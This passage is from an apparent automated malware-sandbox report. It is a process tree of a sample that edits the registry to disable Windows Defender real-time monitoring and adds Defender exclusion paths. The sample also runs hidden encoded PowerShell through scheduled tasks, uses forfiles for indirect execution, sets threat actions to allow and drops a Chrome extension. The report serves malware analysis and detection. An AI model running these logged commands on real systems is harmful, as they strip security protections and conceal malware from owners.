                                                                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:3664
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                                4⤵
                                                                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                PID:1740
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:3940
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2260
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /CREATE /TN "gkqldjytC" /SC once /ST 07:05:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:3988
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /run /I /tn "gkqldjytC"
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2660
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "gkqldjytC"
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2456
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                                                                                3⤵
                                                                                                                                                • Indirect Command Execution
                                                                                                                                                PID:1536
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:1260
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                    5⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:1976
                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                      6⤵
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2008
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2544
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3688
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2404
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2184
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:768
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3684
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:448
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:476
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /C copy nul "C:\Windows\Temp\HIoTiJfsoGzpkHVf\oCececLF\inWaTBhgDMjAznmV.wsf"
                                                                                                                                                  3⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2060
                                                                                                                                                • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                  wscript "C:\Windows\Temp\HIoTiJfsoGzpkHVf\oCececLF\inWaTBhgDMjAznmV.wsf"
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  PID:3028
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3764
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1984
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3716
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3748
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:2264
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3940
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:2444
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3040
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:2692
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:864
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:3628
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2552
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3136
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:2764
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:2396
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3524
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3576
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3080
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                      PID:3036
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1996
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        4⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:3588
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                        4⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:2952
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        4⤵
                                                                                                                                                          PID:3516
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2200
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2632
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:3656
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                                PID:3696
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:3644
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:2404
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    4⤵
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:1992
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3828
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3432
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:660
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2064
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            4⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:3420
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1740
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /CREATE /TN "gqCpjOqle" /SC once /ST 08:23:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                            PID:3128
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /run /I /tn "gqCpjOqle"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:2444
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /DELETE /F /TN "gqCpjOqle"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:1496
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                PID:2340
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:2368
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3572
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:2456
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 01:26:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\pWxLNJI.exe\" 9Z /brCOdidWt 385121 /S" /V1 /F
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                    PID:1724
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /run /I /tn "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:3612
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 604
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:2040
                                                                                                                                                                                  • C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\pWxLNJI.exe
                                                                                                                                                                                    C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\pWxLNJI.exe 9Z /brCOdidWt 385121 /S
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Drops Chrome extension
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:2024
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2200
                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                          PID:2056
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:3608
                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:3704
                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Indirect Command Execution
                                                                                                                                                                                              PID:1944
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:3656
                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                    6⤵
